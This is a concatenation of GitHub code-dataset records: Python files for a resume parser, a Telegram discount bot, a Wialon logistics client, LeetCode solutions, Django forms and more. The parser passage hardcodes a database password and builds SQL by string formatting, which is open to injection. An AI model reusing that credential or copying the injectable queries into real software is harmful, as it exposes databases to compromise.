i[1] == 'Experience Description':\n if index< 0:\n continue\n else:\n if 'Description' not in result['Experience'][index]:\n result['Experience'][index]['Description'] = []\n result['Experience'][index]['Description'] += [i[0]]\n return result\n\ndef updateDb(final,uid):\n db = py.connect('webhost.engr.illinois.edu','jobhunter_whu14','Fuckuiuc12','jobhunter_db')\n\n cursor = db.cursor()\n cursor.execute(\"SELECT * FROM `user` WHERE `uid`=\"+str(uid))\n data = cursor.fetchall()\n school = data[0][6]\n major = data[0][8]\n secondMajor = data[0][9]\n minor = data[0][11]\n GPA = data[0][12]\n\n for i in final:\n #------User\n if i == 'University' and school == \"\":\n school = final[i]\n if i == 'Major':\n if major == \"\":\n major = final[i]\n if secondMajor == \"\":\n secondMajor = final[i]\n if i == 'Minor' and minor == \"\":\n minor = final[i]\n if i == 'GPA' and GPA == \"\":\n GPA = final[i]\n\n #------Experience\n if i == 'Experience':\n cursor.execute(\"SELECT MAX(uidExpNum) FROM Experience WHERE uid=\" + str(uid))\n data = cursor.fetchall()\n nextIndex = 1 if data[0][0] is None else data[0][0] + 1\n\n for j in final[i]:\n title = \"\"\n description = \"\"\n location = \"\"\n for k in j:\n if k == 'Title':\n title = j[k]\n if k == 'Location':\n location = j[k]\n if k == 'Description':\n for l in j[k]:\n description += l\n cursor.execute(\"INSERT INTO `Experience`(`Title`, `Location`, `Description`, `uidExpNum`, `uid`) VALUES ('{}','{}','{}','{}','{}')\".format(title,location,description,nextIndex,uid))\n nextIndex += 1\n\n #------Skill\n if i == 'Skill':\n cursor.execute(\"SELECT MAX(skillNum) FROM hasSkill WHERE uid=\" + str(uid))\n data = cursor.fetchall()\n nextIndex = 0 if data[0][0] is None else data[0][0]\n\n for j in final[i]:\n nextIndex += 1\n cursor.execute(\"INSERT INTO hasSkill(uid, SkillName, skillNum) VALUES ('{}','{}','{}')\".format(uid,j,nextIndex))\n\nuid = sys.argv[1]\ntargetFile = open(\"../python/\"+uid+\".txt\", 'r')\n\n# parameters CHANGE IT ACCORDINGLY!\nnum = 3\nminSupp = 0.5\nNumofSamples = 0\n\nfor line in targetFile:\n numOfEmpty = 0\n emptyLine = 0\n\n while numOfEmpty < len(line):\n\n if line[numOfEmpty] == '\\n' or line[numOfEmpty] =='\\r':\n emptyLine = 1\n break\n\n elif line[numOfEmpty] == ' ':\n numOfEmpty += 1\n\n else:\n break\n\n if emptyLine != 1:\n NumofSamples += 1\n\ntargetFile.seek(0)\nnewLabels, confidence = determineLabel(NumofSamples, targetFile, num, minSupp)\n\nfinal = assignRightThings(newLabels)\nprint(final)\nupdateDb(final,uid)\n\n\n\n","repo_name":"charlieyyy/internX","sub_path":"python/Parser/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":8424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7022105813","text":"# -*- coding: cp1251 -*-\nimport asyncio\nimport json\nimport logging\nfrom datetime import datetime\n\nimport schedule, time\nfrom aiogram.utils.markdown import hlink, hbold\n\nimport config\nfrom aiogram import Bot, Dispatcher, types, executor\nfrom aiogram.dispatcher.filters import Text\nfrom parser import parser_discounts_game\n\n# инициализируем бота\nbot = Bot(token=config.API_TOKEN, parse_mode=types.ParseMode.HTML)\n# Диспетчер для бота\ndp = Dispatcher(bot)\n# Включаем логирование, чтобы не пропустить важные сообщения\nlogging.basicConfig(level=logging.INFO)\n\nnow = datetime.now()\ncurrent_time = now.strftime(\"%H:%M:%S\")\n\n\nasync def setup_bot_commands(dp):\n bot_commands = [\n types.BotCommand(command=\"start\", description=\"Запустить бота\"),\n types.BotCommand(command=\"promo\", description=\"Список действующих и ближайших акций\"),\n types.BotCommand(command=\"shop\", description=\"Ссылка на магазин Epic Games\"),\n types.BotCommand(command=\"info\", description=\"Информация\"),\n types.BotCommand(command=\"help\", description=\"Отображает список всех доступных команд\")\n ]\n await bot.set_my_commands(bot_commands)\n\n\n@dp.message_handler(commands=\"help\")\nasync def help_info(message: types.Message):\n await message.answer(\n text='''\n Мои команды:\n /start - Запускает бота\n /promo - Список действующих и ближайших акций\n /shop - Ссылка на магазин Epic Games\n /info - Информация\n /help - Отображает список всех доступных команд\n '''\n )\n\n\n@dp.message_handler(commands=\"start\")\nasync def start_bot(message: types.Message):\n await message.answer('Привет {0.first_name} !\\nЯ - PaperGirl Aya!\\nЯ буду отправлять тебе уведомление о новый акциях в Epic Games :)'.format(message.from_user))\n\n@dp.message_handler(commands=[\"promo\"])\nasync def get_discount_Game(message: types.Message):\n await message.answer(\"Пожалуйста подождите...\")\n\n parser_discounts_game()\n\n with open(\"new_json.json\") as file:\n data = json.load(file)\n\n for item in data:\n card = f\"{hlink(item.get('url'), item.get('url'))}\\n\" \\\n f\"{hbold('Заголовок: ')} {item.get('title')}\\n\" \\\n f\"{hbold('Описание: ')} {item.get('description')}\\n\" \\\n f\"{hbold('Цена: ')} {item.get('price')}\\n\" \\\n f\"{hbold('Цена со скидкой: ')} {item.get('discountPrice')}\\n\" \\\n f\"{hbold('Дата начала акции: ')} {item.get('startDate')}\\n\" \\\n f\"{hbold('Дата конца акции: ')} {item.get('endDate')}\\n\" \\\n\n await message.answer(card)\n\n\n@dp.message_handler(commands=[\"shop\"])\nasync def ShopEG(message: types.Message):\n await bot.send_message(message.from_user.id, \"Ваша ссылка на магазин Epic games \" + str('epicgames.com/'))\n\n\n@dp.message_handler(commands=[\"info\"])\nasync def Info(message: types.Message):\n cardInfo = f\"{hbold('Разработчики: ')} : Исрафилов Сабухи, Силинский Антон, Паргачёв Алексей\\n\" \\\n f\"{hbold('Наш сайт: ')} : Здесь будет ссылка на сайт если Тоха развернет на сервак :)\\n\" \\\n f\"{hbold('Дискорд бот: ')} : {hlink('PaperGirl Aya', '')}\" \\\n\n await bot.send_message(message.from_user.id, cardInfo)\n\n\nif __name__ == '__main__':\n executor.start_polling(dp, on_startup=setup_bot_commands)\n\n","repo_name":"IsSabuhi/PaperGirl-Python-TelegramBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6844600783","text":"import pygments.styles\nfrom pygments.token import string_to_tokentype\nfrom pygments.util import ClassNotFound\n\nfrom prompt_toolkit.styles import default_style_extensions, style_from_dict\n\n\ndef style_factory(name, cli_style):\n \"\"\"Get a named style for the CLI.\n\n Paramters\n ---------\n name: `str`\n Name of style class.\n cli_style: `dict`\n \n Returns\n -------\n pymgents.style.BaseStyle\n \"\"\"\n try:\n style = pygments.styles.get_style_by_name(name)\n except ClassNotFound:\n style = pygments.styles.get_style_by_name('native')\n\n styles = {}\n styles.update(style.styles)\n styles.update(default_style_extensions)\n custom_styles = {string_to_tokentype(x): y for x, y in cli_style.items()}\n styles.update(custom_styles)\n\n return style_from_dict(styles)\n\n","repo_name":"man-group/okcli","sub_path":"okcli/clistyle.py","file_name":"clistyle.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"32"} +{"seq_id":"38708753683","text":"'''\nGiven the root of a binary tree, the level of its root is 1, the level of its children is 2, and so on.\n\nReturn the smallest level x such that the sum of all the values of nodes at level x is maximal.\n\n \n\nExample 1:\n\n\nInput: root = [1,7,0,7,-8,null,null]\nOutput: 2\nExplanation: \nLevel 1 sum = 1.\nLevel 2 sum = 7 + 0 = 7.\nLevel 3 sum = 7 + -8 = -1.\nSo we return the level with the maximum sum which is level 2.\nExample 2:\n\nInput: root = [989,null,10250,98693,-89388,null,null,null,-32127]\nOutput: 2\n \n\nConstraints:\n\nThe number of nodes in the tree is in the range [1, 104].\n-105 <= Node.val <= 105\n'''\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def maxLevelSum(self, root: TreeNode) -> int:\n \n if not root:\n return root\n \n queue = [root]\n summ = float('-inf')\n max_summ = float('-inf')\n max_level = 0\n l = 0\n while queue:\n summ = 0\n layer = []\n l += 1\n \n for i in range(len(queue)):\n Node = queue.pop(0)\n layer.append(Node)\n summ += Node.val\n if Node.left:\n queue.append(Node.left)\n if Node.right:\n queue.append(Node.right)\n \n if summ > max_summ:\n max_summ = summ\n max_level = l\n \n \n return max_level\n \n ","repo_name":"rabi-siddique/LeetCode","sub_path":"Trees/MaximumLevelSum.py","file_name":"MaximumLevelSum.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16678277764","text":"from django import forms\n\nfrom .models import Category, TransactionRecord\n\nclass UserImportForm(forms.Form):\n file = forms.FileField(\n widget=forms.FileInput(attrs={'accept': 'text/csv'})\n )\n\nclass BookSearchForm(forms.Form):\n category = forms.ModelChoiceField(queryset=Category.objects.all(), required=False)\n word = forms.CharField(required=False, widget=forms.TextInput(attrs={'type': 'search'}))\n\nclass CoinChargeForm(forms.ModelForm):\n class Meta:\n model = TransactionRecord\n fields = ['amount', 'user']\n widgets = {\n 'user': forms.HiddenInput\n }\n\nclass CoinUseForm(forms.ModelForm):\n class Meta:\n model = TransactionRecord\n fields = {'user', 'book'}\n widgets = {\n 'user': forms.HiddenInput,\n 'book': forms.HiddenInput\n }","repo_name":"komisal/django_win","sub_path":"onboro/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34750620433","text":"import numpy as np\nfrom collections import deque, defaultdict\ndef isBipartite(graph) -> bool:\n n = len(graph)\n color = np.zeros(n, int)\n for i in range(n):\n if(color[i] == 0):\n queue = deque()\n queue.append(i)\n color[i] = 1\n while(queue):\n curr = queue.popleft()\n for j in graph[curr]:\n if(color[curr] == color[j]):\n return False\n if(color[j] == 0):\n color[j]= -color[curr]\n queue.append(j)\n return True\n\n\nif __name__ == '__main__':\n print(isBipartite([[1,2,3],[0,2],[0,1,3],[0,2]]))\n print(isBipartite([[1,3],[0,2],[1,3],[0,2]]))","repo_name":"anki08/Leetcode-Solutions","sub_path":"Graph/BFS/isBipartite.py","file_name":"isBipartite.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"34359884391","text":"import datetime\nimport logging\nimport os\nimport sys\nimport time\nimport traceback\n\nimport requests\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom wialon import Wialon, WialonError\n\nlog = logging.getLogger(os.path.basename(__file__))\n\ncomands_types = {\n \"/start\": \"Процедура авторизации\",\n \"/help\": \"Описание комант бота\",\n \"/add_orders\": \"Добавить заявку в созданый маршрут\",\n \"/start_route\": \"Создать новый маршрут\",\n \"/send_location\": \"Отправить координаты\",\n \"/i_am_here\": \"Добавить метку по прибытию к клиенту. Создаеться новая заявка\"\n\n}\n\n\nclass States(StatesGroup):\n STATE_GET_COMMAND = State()\n STATE_GET_TAG = State()\n STATE_GET_ORDERS = State()\n STATE_INITIAL_WAREHOUSE = State()\n STATE_FINAL_WAREHOUSE = State()\n STATE_CREATE_ROUTS = State()\n\n STATE_GET_NUMBER = State()\n\n STATE_INITIAL_ADD_ORDERS = State()\n STATE_GET_TAG_ADD_ORDERS = State()\n STARE_GET_ORDERS_ADD_ORDERS = State()\n STATE_FINAL_ADD_ORDERS = State()\n\n\ndef exp_calc(order: list, time_value: str, ceratain=True):\n '''\n Функция для расчета времени до автозавершения маршрута.\n Нужно подставлять в параметр \"exp\" присоздании/редактировании маршрута\n :param order: список заявок\n :param time: строка в виде \"hh:mm\"\n :param ceratain: если True, то возвращаеться время от последней заявки до значения time.\n Если False, то возвращаеться значение time в секундах\n :return: Количество секунд.\n '''\n data = time.strptime(time_value, \"%H:%M\")\n data = datetime.timedelta(hours=data.tm_hour, minutes=data.tm_min).seconds\n if ceratain is True:\n max_vt = 0\n for el in order:\n max_vt = max(max_vt, el['p']['r']['vt'])\n exp = int(time.time())\n exp -= exp % 86400\n exp += data\n if max_vt < exp:\n return exp - max_vt\n else:\n return max_vt\n else:\n return data\n\n\ndef create_order(**kwargs) -> dict:\n time_now = int(time.time())\n params = {\n 'id': 0,\n 'tf': time_now - (time_now % 86400),\n 'tt': time_now - (time_now % 86400) + 86400,\n 'r': 100,\n 'trt': 3600\n }\n for key, value in kwargs.items():\n if key == 'n':\n params['n'] = value\n params['p'] = {'n': value}\n elif key == 'a':\n params['p']['a'] = value\n elif key == 'p':\n params['p']['p'] = value\n elif key == 'y':\n params['y'] = value\n elif key == 'x':\n params['x'] = value\n elif key == 'f':\n params['f'] = value\n elif key == 'tf':\n params['tf'] = value\n elif key == 'tt':\n params['tt'] = value\n elif key == 'tft':\n params['tft'] = value\n elif key == 'callMode': params['callMode'] = value\n\n return params\n\n\nclass Orders(Wialon):\n driver_data = dict()\n orders_for_route = dict()\n warehouses_for_route = dict()\n orders_list = dict()\n raw_data = None\n data_by_tags = None\n warehouse = dict()\n orders = None\n user_id = None\n user_name = None\n itemIds = None\n token = None\n save_time = int(time.time())\n\n def __init__(self, wialon_object, token, **extra_params):\n super().__init__(**extra_params)\n self.wialon_object = wialon_object\n self.token = token\n self.itemIds = self.get_resource_for_orders()\n\n def get_orders(self):\n try:\n spec = {\n \"itemsType\": \"avl_resource\",\n \"propType\": \"propitemname\",\n \"propName\": \"orders\",\n \"propValueMask\": \"*\",\n \"sortType\": \"orders\"\n }\n params = {\n \"spec\": spec,\n \"force\": 1,\n \"flags\": 524288,\n \"from\": 0,\n \"to\": 0\n }\n orders = self.wialon_object.call('core_search_items', params)\n self.orders = orders['items']\n except Exception as e:\n res = self.wialon_object.token_login(token=self.token)\n self.wialon_object.sid = res['eid']\n spec = {\n \"itemsType\": \"avl_resource\",\n \"propType\": \"propitemname\",\n \"propName\": \"orders\",\n \"propValueMask\": \"*\",\n \"sortType\": \"orders\"\n }\n params = {\n \"spec\": spec,\n \"force\": 1,\n \"flags\": 524288,\n \"from\": 0,\n \"to\": 0\n }\n orders = self.wialon_object.call('core_search_items', params)\n self.orders = orders['items']\n finally:\n tags_key = dict(No_tags='')\n for el in self.orders:\n orders = el['orders']\n for name in orders.values():\n\n if name['f'] == 32 and name['p']['r'] is None:\n\n try:\n if name['p']['tags'] == [] or type(name['p']['tags']) == str:\n tags_value = tags_key.get('No_tags')\n tags_value = dict(tags_value)\n tags_value.update({name['id']: name})\n tags_key['No_tags'] = tags_value\n self.orders_list.update({name['id']: name})\n else:\n for tags in name['p']['tags']:\n if tags_key.get(tags) is None:\n tags_key.update({tags: ''})\n tags_key[tags] = {name['id']: name}\n self.orders_list.update({name['id']: name})\n else:\n tags_value = tags_key.get(tags)\n tags_value.update({name['id']: name})\n tags_key[tags] = tags_value\n self.orders_list.update({name['id']: name})\n except:\n print(name)\n tags_value = tags_key.get('No_tags')\n tags_value = dict(tags_value)\n tags_value.update({name['id']: name})\n tags_key['No_tags'] = tags_value\n self.orders_list.update({name['id']: name})\n elif name['f'] & 4 and name['p']['r'] is None:\n self.warehouse.update({name['id']: name})\n\n self.data_by_tags = tags_key\n return self.orders\n\n def craete_route(self, orders_id: list, warehouses: list, driver: int):\n gis = {\n \"provider\": 1, # 0-нет, 1-gurtam, 2-google\n \"addPoints\": 1, # 0-не возвращать трек, 1-вернуть трек\n \"speed\": 50 # скорость для оптимизации\n }\n params = {\n \"itemId\": self.itemIds,\n \"orders\": orders_id,\n \"units\": [driver],\n \"warehouses\": warehouses,\n \"criterions\": {},\n \"flags\": 131,\n \"gis\": gis\n }\n try:\n response = self.wialon_object.call('order_optimize', params)\n\n except WialonError as e:\n res = self.wialon_object.token_login(token=self.token)\n self.wialon_object.sid = res['eid']\n response = self.wialon_object.call('order_optimize', params)\n self.get_orders()\n route_id = int(time.time())\n order_list = list()\n order_warehouse = orders_id\n order_warehouse.extend(warehouses)\n try:\n for keys, data in response.items():\n if keys == 'details':\n pass\n elif keys == 'success':\n pass\n elif keys == 'summary':\n pass\n else:\n i = 0\n # записываем данные о посещении первой точки. Проверяем на TypeError\n # Виалон бывает возвращает заявки (orders) в виде списка в списке orders: [[]]\n try:\n t_prev = data['orders'][0]['tm']\n except TypeError:\n element_orders = data['orders'][0]\n data['orders'] = element_orders\n t_prev = data['orders'][0]['tm']\n ml_prev = 0\n vt = (route_id % 86400)\n for _ in data['orders']:\n data_orders = dict()\n number = _['id']\n if type(order_warehouse[number]) is int:\n data_orders = self.orders[0]['orders'][f'{order_warehouse[number]}']\n data_orders['f'] = 0\n elif type(order_warehouse[number]) is dict:\n data_orders = order_warehouse[number]\n # if ((route_id + time.altzone) % 86400) >= _['tm']:\n if ((route_id + 10800) % 86400) >= _['tm']: # вместо 10800 нужно подставить временную зону\n # if (route_id % 86400) >= _['tm']:\n tm = _['tm'] - t_prev\n ml = _['ml'] - ml_prev\n vt = vt + tm\n data_orders['p']['r'] = {\n \"id\": route_id, # id маршрута\n \"i\": i, # порядковый номер (0..)\n \"m\": ml, # пробег с предыдущей точки по плану, м\n \"t\": tm, # время с предыдущей точки по плану, сек\n \"vt\": _['tm'], # время посещения по плану, UNIX_TIME\n \"ndt\": 300 # время, за которое должно прийти уведомление, с\n }\n t_prev = _['tm']\n ml_prev = _['ml']\n else:\n tm = _['tm'] - t_prev\n ml = _['ml'] - ml_prev\n vt = _['tm']\n data_orders['p']['r'] = {\n \"id\": route_id, # id маршрута\n \"i\": i, # порядковый номер (0..)\n \"m\": ml, # пробег с предыдущей точки по плану, м\n \"t\": tm, # время с предыдущей точки по плану, сек\n \"vt\": vt, # время посещения по плану, UNIX_TIME\n \"ndt\": 300 # время, за которое должно прийти уведомление, с\n }\n t_prev = _['tm']\n ml_prev = _['ml']\n data_orders['u'] = keys\n data_orders['rp'] = _['p']\n data_orders['uid'] = 0\n data_orders['id'] = 0\n data_orders['st'] = 0\n data_orders['callMode'] = 'create'\n order_list.append(data_orders)\n i += 1\n except WialonError as e:\n log.info(f'Ошибка: {e.args}')\n\n exp = exp_calc(order_list, \"23:59\")\n params = {\n \"itemId\": self.itemIds,\n \"orders\": order_list,\n \"routeId\": route_id,\n \"exp\": exp,\n \"callMode\": 'create'\n }\n try:\n response = self.wialon_object.call('order_route_update', params)\n except Exception as e:\n log.info(f'Ошибка: {e.args}')\n return response\n\n def update_route(self, order, driver):\n data_orders = dict()\n orders_route = list()\n data = list()\n route_id = int()\n for key, route in self.orders[0]['order_routes'].items():\n if route['st']['u'] == driver and route['st']['s'] == 1:\n orders_route = route['ord']\n route_id = route['uid']\n if len(orders_route) != 0:\n for key, order_ in self.orders[0]['orders'].items():\n if order_['uid'] in orders_route:\n # order['callMode'] = ''\n data.append(order_)\n data.sort(key=lambda dat: dat['p']['r']['vt'])\n order_list = data\n data_len = len(data) - 1\n orders_for_route = []\n warehouses_for_route = []\n if data[data_len]['f'] & 8:\n orders_for_route.append(data[data_len - 1])\n warehouses_for_route.append(data[data_len])\n order_list.pop()\n else:\n orders_for_route.append(data[data_len])\n\n\n __ = order\n time_now = int(time.time())\n\n __['tf'] = time_now - (time_now % 86400) - 10800\n __['tt'] = __['tf'] + 86400\n __['f'] = 0\n __['u'] = str(driver)\n __['callMode'] = 'create'\n orders_for_route.append(__)\n\n\n gis = {\n \"provider\": 1, # 0-нет, 1-gurtam, 2-google\n \"addPoints\": 1, # 0-не возвращать трек, 1-вернуть трек\n \"speed\": 50 # скорость для оптимизации\n }\n params = {\n \"itemId\": self.itemIds,\n \"orders\": orders_for_route,\n \"units\": [driver],\n \"warehouses\": warehouses_for_route,\n \"criterions\": {},\n \"priority\": {driver: {0: 0}},\n \"flags\": 131,\n \"gis\": gis\n }\n\n request = self.wialon_object.call('order_optimize', params)\n\n order_warehouse = orders_for_route\n order_warehouse.extend(warehouses_for_route)\n vt = orders_for_route[0]['p']['r']['vt']\n i = orders_for_route[0]['p']['r']['i']\n i += 1\n for keys, data in request.items():\n if keys == 'details':\n pass\n elif keys == 'success':\n pass\n elif keys == 'summary':\n pass\n else:\n # записываем данные о посещении первой точки. Проверяем на TypeError\n # Виалон бывает возвращает заявки (orders) в виде списка в списке orders: [[]]\n try:\n t_prev = data['orders'][0]['tm']\n except TypeError:\n element_orders = data['orders'][0]\n data['orders'] = element_orders\n t_prev = data['orders'][0]['tm']\n\n ml_prev = 0\n data['orders'].pop(0)\n for _ in data['orders']:\n number = _['id']\n tm = _['tm'] - t_prev\n ml = _['ml'] - ml_prev\n vt = vt + tm\n data_orders = dict(order_warehouse[number])\n data_orders['p']['r'] = {\n \"id\": route_id, # id маршрута\n \"i\": i, # порядковый номер (0..)\n \"m\": ml, # пробег с предыдущей точки по плану, м\n \"t\": tm, # время с предыдущей точки по плану, сек\n \"vt\": vt, # время посещения по плану, UNIX_TIME\n \"ndt\": 300 # время, за которое должно прийти уведомление, с\n }\n if vt >= data_orders['tt']:\n data_orders['tt'] = vt + 3600\n t_prev = _['tm']\n ml_prev = _['ml']\n data_orders['u'] = keys\n data_orders['rp'] = _['p']\n\n if data_orders['f'] == 0:\n data_orders['callMode'] = 'create'\n data_orders['uid'] = 0\n data_orders['id'] = 0\n data_orders['st'] = 0\n dp = data_orders['uid']\n\n else:\n data_orders['callMode'] = 'update'\n # data_orders['p']['r']['vt'] -= _['tm']\n '''\n if data_orders['f'] == 264:\n dp2 = list(data_orders['dp'])\n dp2.append(dp)\n data_orders['dp'] = dp2\n '''\n\n # data_orders['itemId'] = orders.itemIds\n order_list.append(data_orders)\n i += 1\n\n exp = exp_calc(order_list, \"23:59\")\n params = {\n \"itemId\": self.itemIds,\n \"orders\": order_list,\n \"routeId\": route_id,\n \"exp\": exp, # здесь указываем, через сколько закрываем маршрут\n \"callMode\": \"update\"\n }\n\n try:\n response = self.wialon_object.call('order_route_update', params)\n data.clear()\n data_orders.clear()\n return response\n except Exception as e:\n tb = sys.exc_info()[2]\n tbinfo = traceback.format_tb(tb)[0]\n log.error(f'Traceback info:\\n{tbinfo}\\n{e.args}')\n log.info(f'Params: {params}')\n data.clear()\n data_orders.clear()\n return e.args\n\n def copy_order(self, id: int, flags: int) -> dict:\n '''\n Функция возвращает копию заявки по id\n :param id: id заявки в Logistics\n :param flags: флаг заявки\n :return: словарь з параметрами заявки\n '''\n data_orders = None\n try:\n data_orders = self.orders_list[id]\n except:\n data_orders = self.warehouse[id]\n finally:\n data_orders['f'] = flags\n time_1 = int(time.time())\n time_1 = time_1 - (time_1 % 86400) - 10800 # вместо 10800 нужно подставить временную зону\n data_orders['tf'] = time_1 + data_orders['tf']\n data_orders['tt'] = time_1 + data_orders['tt']\n return data_orders\n\n def get_driver(self, phone_number: str):\n \"\"\"\n :param phone_number: номер телефона , должен совпасть с номером водителя в Wialon\n :return: если номер телефона совпал возврашаем id назначеного обьекта\n если обьект не назначен возвращаеться 0\n если номер телефона не совпал возвращаем None\n \"\"\"\n spec = {\n \"itemsType\": \"avl_resource\",\n \"propType\": \"propitemname\",\n \"propName\": \"drivers\",\n \"propValueMask\": \"*\",\n \"sortType\": \"drivers\"\n }\n params = {\n \"spec\": spec,\n \"force\": 1,\n \"flags\": 256,\n \"from\": 0,\n \"to\": 0\n }\n response = None\n try:\n response = self.wialon_object.call('core_search_items', params)\n except WialonError:\n res = self.wialon_object.token_login(token=self.token)\n self.wialon_object.sid = res['eid']\n response = self.wialon_object.call('core_search_items', params)\n finally:\n driver = response['items'][0]['drvrs']\n for _ in driver.values():\n if _['p'][-10:] != '':\n number = _['p'][-10:]\n if number == phone_number[-10:]:\n return _['bu']\n return None\n\n def get_last_navigation(self, driver):\n params = {\n \"id\": driver,\n \"flags\": 1024\n }\n response = None\n try:\n response = self.wialon_object.call('core_search_item', params)\n except WialonError:\n res = self.wialon_object.token_login(token=self.token)\n self.wialon_object.sid = res['eid']\n response = self.wialon_object.call('core_search_item', params)\n finally:\n return response['item']['pos']\n\n def get_resource_for_orders(self):\n '''\n :return: функция возвращает id ресурса, в котором нужно создать заявки\n '''\n spec = {\n \"itemsType\": \"avl_resource\",\n \"propType\": \"property\",\n \"propName\": \"sys_id\",\n \"propValueMask\": '*',\n \"sortType\": \"sys_id\"\n }\n params = {\n \"spec\": spec,\n \"force\": 1,\n \"flags\": 1,\n \"from\": 0,\n \"to\": 0\n }\n data = self.wialon_object.call('core_search_items', params)\n for el in data['items']:\n if el['uacl'] & 0x600000000: # Просмотр заявок и его свойств, создание/редактирование/удаление заявок\n return el['id']\n return None\n\n def import_messages(self, file, unit_id):\n files = {'file': file}\n base_url = 'https://hst-api.wialon.com/wialon/ajax.html?'\n params = {\"itemId\": unit_id}\n\n url = base_url + 'svc=exchange/import_messages¶ms={\"itemId\":%s}&sid=%s'\n r = requests.post(url % (unit_id, self.wialon_object.sid), files=files)\n return r.text\n","repo_name":"AlexandrMilyaev/telegramBotForLogistics","sub_path":"import/telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":23029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15385980240","text":"import func\r\n\r\ndef function_1_2(rows_list):\r\n # min_vol_value, max_vol_value, min_vol_index, max_vol_index = [[]]*4\r\n # min_tpr_value, max_tpr_value, min_tpr_index, max_tpr_index = [[]]*4\r\n min_vol_value = []\r\n max_vol_value = []\r\n min_vol_index = []\r\n max_vol_index = []\r\n min_tpr_value = []\r\n max_tpr_value = []\r\n min_tpr_index = []\r\n max_tpr_index = []\r\n\r\n for i in range(0, len(rows_list)):\r\n if 'Invalid' not in rows_list[i]['电池单体电压最低值']:\r\n temp_min_vol_value,temp_max_vol_value,temp_min_vol_index,tem_max_vol_index = function(rows_list,i,'电池单体电压最低值','电池单体电压最高值','最低电压电池单体代号','最高电压电池单体代号','单体电池电压')\r\n temp_min_tpr_value, temp_max_tpr_value, temp_min_tpr_index, temp_max_tpr_index = function(rows_list,i,'最低温度值','最高温度值', '最低温度探针序号','最高温度探针序号','探针温度值')\r\n min_vol_value.append(temp_min_vol_value)\r\n max_vol_value.append(temp_max_vol_value)\r\n min_vol_index.append(temp_min_vol_index)\r\n max_vol_index.append(tem_max_vol_index)\r\n\r\n min_tpr_value.append(temp_min_tpr_value)\r\n max_tpr_value.append(temp_max_tpr_value)\r\n min_tpr_index.append(temp_min_tpr_index)\r\n max_tpr_index.append(temp_max_tpr_index)\r\n resultList = [min_vol_value,max_vol_value,min_vol_index,max_vol_index,min_tpr_value,max_tpr_value,min_tpr_index,max_tpr_index]\r\n\r\n for temp in resultList:\r\n temp = func.delNul(temp)\r\n\r\n print('case_1:电池单体电��最低值错误:'+str(min_vol_value))\r\n print(' 电池单体电压最高值错误:' + str(max_vol_value))\r\n print(' 最低电压电池单体代号错误:' + str(min_vol_index))\r\n print(' 最高电压电池单体代号错误:' + str(max_vol_index))\r\n print(' 最低温度值错误:' + str(min_tpr_value))\r\n print(' 最高温度值错误:' + str(max_tpr_value))\r\n print(' 最低温度探针序号错误:' + str(min_tpr_index))\r\n print(' 最高温度探针序号错误:' + str(max_tpr_index))\r\n\r\n return [min_vol_value,max_vol_value,min_vol_index,max_vol_index,min_tpr_value,max_tpr_value,min_tpr_index,max_tpr_index]\r\n\r\ndef function(var_rows_list,index, name_min_value, name_max_value, name_min_index, name_max_index, name_total_value):\r\n\r\n vol_list = var_rows_list[index][name_total_value]\r\n err_min_value = ''\r\n err_max_value = ''\r\n err_min_index = ''\r\n err_max_index = ''\r\n\r\n if vol_list :\r\n vol_list = vol_list[1:-1].split(',')\r\n vol_list = list(map(float, vol_list))\r\n # if 'Invalid' not in rows_list[index][name_min_value] or 'Invalid' not in rows_list[index][name_max_value]:\r\n if float(var_rows_list[index][name_min_value]) != min(vol_list):\r\n err_min_value = var_rows_list[index]['log行号']\r\n if float(var_rows_list[index][name_max_value])!= max(vol_list):\r\n err_max_value = var_rows_list[index]['log行号']\r\n # else:\r\n # print(rows_list[index]['log行号']+'行存在无效值')\r\n\r\n # if 'Invalid' not in rows_list[index][name_min_index] or 'Invalid' not in rows_list[index][name_max_index]:\r\n if int(float(var_rows_list[index][name_min_index])) != vol_list.index(min(vol_list)):\r\n err_min_index = var_rows_list[index]['log行号']\r\n if int(float(var_rows_list[index][name_max_index])) != vol_list.index(max(vol_list)):\r\n err_max_index = var_rows_list[index]['log行号']\r\n # else:\r\n # print(rows_list[index]['log行号'] + '行存在无效值')\r\n\r\n return err_min_value,err_max_value,err_min_index,err_max_index\r\n\r\n\r\n\r\n","repo_name":"hhxxss0722/double","sub_path":"test_log/case_1_2.py","file_name":"case_1_2.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24480902525","text":"# 종합 - 거기까지 그만\n# 입력 : 언제까지 합을 계산할 지, 정수 1개를 입력받음\n# 단, 입력되는 자연수는 100,000,000이하\n# 출력 : 1, 2 ,3 ,4, 5, ... 순서대로 계속 더해가다가,\n# 그 합이 입력된 정수보다 커지거나 같아지는 경우,\n# 그때까지의 합을 출력\n\nn = int(input())\ns = 0\ni = 0\n\nwhile s < n:\n i += 1\n s = s + i\nprint(s)","repo_name":"Jin-Sol23/CodeUp","sub_path":"86.py","file_name":"86.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73545064731","text":"#!/usr/bin/python3\nimport sys\nimport os\nimport subprocess\n\nclass TerminalSetup:\n def __init__(self):\n if not os.getuid() == 0:\n print(\"You must be root!\")\n sys.exit(0)\n self.tgtCount = 0\n self.localCount = 0\n \n 